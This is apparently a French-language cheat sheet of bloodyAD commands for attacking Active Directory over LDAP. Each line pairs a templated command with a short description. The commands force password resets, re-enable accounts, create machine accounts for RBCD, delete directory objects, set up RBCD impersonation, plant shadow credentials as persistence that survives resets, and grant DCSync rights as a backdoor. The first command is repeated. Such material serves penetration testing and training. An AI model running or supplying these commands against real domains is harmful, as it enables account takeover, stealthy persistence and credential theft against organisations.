bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS set object '$TARGET_USER' --attribute userPassword --value '$NEWPASS'Description: Reset de mot de passe via LDAP : fonctionne si on a ForceChangePassword ou GenericAll.
Exploitation
Manipulation LDAP directe : objets, ACLs, délégation et persistance via bloodyAD.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS set object '$TARGET_USER' --attribute userPassword --value '$NEWPASS'Description: Reset de mot de passe via LDAP : fonctionne si on a ForceChangePassword ou GenericAll.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS set object '$TARGET_USER' --attribute userAccountControl --value 512Description: Réactiver un compte désactivé (UAC 512 = NORMAL_ACCOUNT) si on a WriteProperty.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add computer '$NEWPC$' '$PASS'Description: Créer un compte machine si MAQ > 0 : utile pour les attaques RBCD.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove object '$TARGET'Description: Supprimer un objet AD si on a DeleteChild sur son parent. Attention : irréversible.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get writable --detailDescription: Trouver tous les attributs modifiables par l'utilisateur courant sans scanner manuellement.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$TARGET' --attr msDS-KeyCredentialLinkDescription: Lire les shadow credentials d'un compte : présence = compte sous contrôle potentiel.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --filter '(adminCount=1)' --attr sAMAccountNameDescription: Lister tous les objets protégés par SDProp (adminCount=1) : cibles de privilège élevées.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add rbcd '$TARGET_COMPUTER$' '$ATTACKER_COMPUTER$'Description: Configurer RBCD sur la cible : l'attaquant peut s'y impersonate via S4U2Proxy.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add shadowCredentials '$TARGET_USER'Description: Ajouter un KeyCredential : persistance discrète qui survit aux resets de mot de passe.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add dcsync '$USER'Description: Accorder les droits DS-Replication-Get-Changes-All à un compte : backdoor DCSync.